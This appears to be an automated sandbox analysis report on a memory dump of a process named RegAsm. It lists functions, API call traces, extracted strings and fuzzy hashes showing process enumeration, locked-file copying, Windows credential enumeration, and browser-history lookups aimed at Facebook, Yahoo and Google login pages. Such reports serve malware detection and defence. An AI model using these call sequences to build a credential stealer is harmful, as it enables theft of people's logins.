                                                          control_flow_graph 563 4091b8-40921b memset call 40a6e6 call 444432 568 409520-409526 563->568 569 409221-40923b call 40b273 call 438552 563->569 573 409240-409248 569->573 574 409383-4093ab call 40b273 call 438552 573->574 575 40924e-409258 call 4251c4 573->575 587 4093b1 574->587 588 4094ff-40950b call 443d90 574->588 580 40937b-40937e call 424f26 575->580 581 40925e-409291 call 4253cf * 2 call 4253af * 2 575->581 580->574 581->580 611 409297-409299 581->611 589 4093d3-4093dd call 4251c4 587->589 588->568 597 40950d-409511 588->597 598 4093b3-4093cc call 4253cf * 2 589->598 599 4093df 589->599 597->568 601 409513-40951d call 408f2f 597->601 598->589 615 4093ce-4093d1 598->615 603 4094f7-4094fa call 424f26 599->603 601->568 603->588 611->580 613 40929f-4092a3 611->613 613->580 614 4092a9-4092ba 613->614 616 4092bc 614->616 617 4092be-4092e3 memcpy memcmp 614->617 615->589 618 4093e4-4093fb call 4253af * 2 615->618 616->617 619 409333-409345 memcmp 617->619 620 4092e5-4092ec 617->620 618->603 628 409401-409403 618->628 619->580 623 409347-40935f memcpy 619->623 620->580 622 4092f2-409331 memcpy * 2 620->622 625 409363-409378 memcpy 622->625 623->625 625->580 628->603 629 409409-40941b memcmp 628->629 629->603 630 409421-409433 memcmp 629->630 631 4094a4-4094b6 memcmp 630->631 632 409435-40943c 630->632 631->603 634 4094b8-4094ed memcpy * 2 631->634 632->603 633 409442-4094a2 memcpy * 3 632->633 635 4094f4 633->635 634->635 635->603
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                          • String ID:
                                                          • API String ID: 3715365532-3916222277
                                                          • Opcode ID: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                                          • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                          • Opcode Fuzzy Hash: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                                          • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59
                                                          Function 00413D4C Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 142processlibraryloaderCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 636 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 639 413f00-413f11 Process32NextW 636->639 640 413da5-413ded OpenProcess 639->640 641 413f17-413f24 CloseHandle 639->641 642 413eb0-413eb5 640->642 643 413df3-413e26 memset call 413f27 640->643 642->639 644 413eb7-413ebd 642->644 649 413e79-413e9d call 413959 call 413ca4 643->649 650 413e28-413e35 643->650 646 413ec8-413eda call 4099f4 644->646 647 413ebf-413ec6 ??3@YAXPAX@Z 644->647 651 413edb-413ee2 646->651 647->651 663 413ea2-413eae CloseHandle 649->663 654 413e61-413e68 650->654 655 413e37-413e44 GetModuleHandleW 650->655 656 413ee4 651->656 657 413ee7-413efe 651->657 654->649 660 413e6a-413e76 654->660 655->654 659 413e46-413e5c GetProcAddress 655->659 656->657 657->639 659->654 660->649 663->642
                                                          APIs
                                                            • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00413D6A
                                                          • memset.MSVCRT ref: 00413D7F
                                                          • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                          • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                          • memset.MSVCRT ref: 00413E07
                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                          • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                                          • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                                          • ??3@YAXPAX@Z.MSVCRT ref: 00413EC1
                                                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                          • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: Handle$??3@CloseProcess32memset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                                          • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                          • API String ID: 912665193-1740548384
                                                          • Opcode ID: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                          • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                          • Opcode Fuzzy Hash: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                          • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9
                                                          Function 0040E01E Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 120fileCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                            • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                            • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                            • Part of subcall function 0040DD85: FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                            • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                            • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                          • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                          • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                          • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                          • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                            • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                            • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                            • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                            • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                          • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                          • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                          • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                          • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                          • FindCloseChangeNotification.KERNELBASE(?), ref: 0040E13E
                                                          • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                          • CloseHandle.KERNEL32(?), ref: 0040E148
                                                          • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: File$Close$Handle$CreateProcess$ChangeCurrentFindNotificationTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                          • String ID: bhv
                                                          • API String ID: 327780389-2689659898
                                                          • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                          • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                          • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                          • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8
                                                          Function 00413F4F Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 29libraryloaderCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 692 413f4f-413f52 693 413fa5 692->693 694 413f54-413f5a call 40a804 692->694 696 413f5f-413fa4 GetProcAddress * 5 694->696 696->693
                                                          APIs
                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                          • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                          • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                          • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                          • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                          • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                          • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                          • API String ID: 2941347001-70141382
                                                          • Opcode ID: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                          • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                                          • Opcode Fuzzy Hash: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                          • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48
                                                          Function 004466F4 Relevance: 18.1, APIs: 12, Instructions: 134COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 697 4466f4-44670e call 446904 GetModuleHandleA 700 446710-44671b 697->700 701 44672f-446732 697->701 700->701 702 44671d-446726 700->702 703 44675b-4467aa __set_app_type __p__fmode __p__commode call 4153f2 701->703 705 446747-44674b 702->705 706 446728-44672d 702->706 710 4467ac-4467b7 __setusermatherr 703->710 711 4467b8-44680e call 4468f0 _initterm __wgetmainargs _initterm 703->711 705->701 709 44674d-44674f 705->709 706->701 708 446734-44673b 706->708 708->701 712 44673d-446745 708->712 713 446755-446758 709->713 710->711 716 446810-446819 711->716 717 44681e-446825 711->717 712->713 713->703 718 4468d8-4468dd call 44693d 716->718 719 446827-446832 717->719 720 44686c-446870 717->720 723 446834-446838 719->723 724 44683a-44683e 719->724 721 446845-44684b 720->721 722 446872-446877 720->722 728 446853-446864 GetStartupInfoW 721->728 729 44684d-446851 721->729 722->720 723->719 723->724 724->721 726 446840-446842 724->726 726->721 730 446866-44686a 728->730 731 446879-44687b 728->731 729->726 729->728 732 44687c-446894 GetModuleHandleA call 41276d 730->732 731->732 735 446896-446897 exit 732->735 736 44689d-4468d6 _cexit 732->736 735->736 736->718
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                          • String ID:
                                                          • API String ID: 2827331108-0
                                                          • Opcode ID: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                          • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                                                          • Opcode Fuzzy Hash: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                          • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E
                                                          Function 0040C274 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 112COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          • memset.MSVCRT ref: 0040C298
                                                            • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                            • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                          • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                          • wcschr.MSVCRT ref: 0040C324
                                                          • wcschr.MSVCRT ref: 0040C344
                                                          • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                          • GetLastError.KERNEL32 ref: 0040C373
                                                          • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                          • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstLast
                                                          • String ID: visited:
                                                          • API String ID: 1157525455-1702587658
                                                          • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                          • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                          • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                          • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9
                                                          Function 0040E175 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 91COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 763 40e175-40e1a1 call 40695d call 406b90 768 40e1a7-40e1e5 memset 763->768 769 40e299-40e2a8 call 4069a3 763->769 771 40e1e8-40e1fa call 406e8f 768->771 775 40e270-40e27d call 406b53 771->775 776 40e1fc-40e219 call 40dd50 * 2 771->776 775->771 782 40e283-40e286 775->782 776->775 787 40e21b-40e21d 776->787 783 40e291-40e294 call 40aa04 782->783 784 40e288-40e290 ??3@YAXPAX@Z 782->784 783->769 784->783 787->775 788 40e21f-40e235 call 40742e 787->788 788->775 791 40e237-40e242 call 40aae3 788->791 791->775 794 40e244-40e26b _snwprintf call 40a8d0 791->794 794->775
                                                          APIs
                                                            • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                          • memset.MSVCRT ref: 0040E1BD
                                                            • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                                                            • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                            • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                            • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                          • _snwprintf.MSVCRT ref: 0040E257
                                                            • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                            • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                            • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                            • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ??3@$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                          • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                          • API String ID: 3883404497-2982631422
                                                          • Opcode ID: 3292a8bc8b2a8f6d115ff62c82a82f0362dff8113198451487ff657a70090be0
                                                          • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                          • Opcode Fuzzy Hash: 3292a8bc8b2a8f6d115ff62c82a82f0362dff8113198451487ff657a70090be0
                                                          • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99
                                                          Function 0040BB98 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 145COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                            • Part of subcall function 0040CC26: FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                            • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                          • memset.MSVCRT ref: 0040BC75
                                                          • memset.MSVCRT ref: 0040BC8C
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                          • memcmp.MSVCRT ref: 0040BCD6
                                                          • memcpy.MSVCRT ref: 0040BD2B
                                                          • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memset$ByteChangeCharCloseFileFindFreeLocalMultiNotificationSizeWide_wcsicmpmemcmpmemcpy
                                                          • String ID:
                                                          • API String ID: 509814883-3916222277
                                                          • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                          • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                          • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                          • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99
                                                          Function 00412465 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 88windowCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                          • String ID: r!A
                                                          • API String ID: 2791114272-628097481
                                                          • Opcode ID: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                                          • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                          • Opcode Fuzzy Hash: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                                          • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                                                          Function 0040C768 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 87COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                                                            • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                                                            • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                                                            • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                            • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                            • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                            • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                            • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                            • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                            • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                            • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                            • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                            • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                            • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                          • _wcslwr.MSVCRT ref: 0040C817
                                                            • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                            • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                          • wcslen.MSVCRT ref: 0040C82C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memset$??3@$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                          • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                          • API String ID: 62308376-4196376884
                                                          • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                          • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                          • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                          • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                                                          Function 0040B58D Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                                          • FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
                                                          • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                          • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                          • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                          • memcpy.MSVCRT ref: 0040B60D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                          • String ID: BIN
                                                          • API String ID: 1668488027-1015027815
                                                          • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                          • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                          • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                          • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                                          Function 0040BDB0 Relevance: 12.2, APIs: 8, Instructions: 151COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                            • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                            • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                            • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                            • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                          • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                          • wcslen.MSVCRT ref: 0040BE06
                                                          • _wcsncoll.MSVCRT ref: 0040BE38
                                                          • memset.MSVCRT ref: 0040BE91
                                                          • memcpy.MSVCRT ref: 0040BEB2
                                                          • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                          • wcschr.MSVCRT ref: 0040BF24
                                                          • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: AddressProc$CredEnumerateFreeLocal_wcsncoll_wcsnicmpmemcpymemsetwcschrwcslen
                                                          • String ID:
                                                          • API String ID: 3191383707-0
                                                          • Opcode ID: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                          • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                                          • Opcode Fuzzy Hash: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                          • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                                          Function 00403C9C Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • memset.MSVCRT ref: 00403CBF
                                                          • memset.MSVCRT ref: 00403CD4
                                                          • memset.MSVCRT ref: 00403CE9
                                                          • memset.MSVCRT ref: 00403CFE
                                                          • memset.MSVCRT ref: 00403D13
                                                            • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                            • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                            • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                          • memset.MSVCRT ref: 00403DDA
                                                            • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                            • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
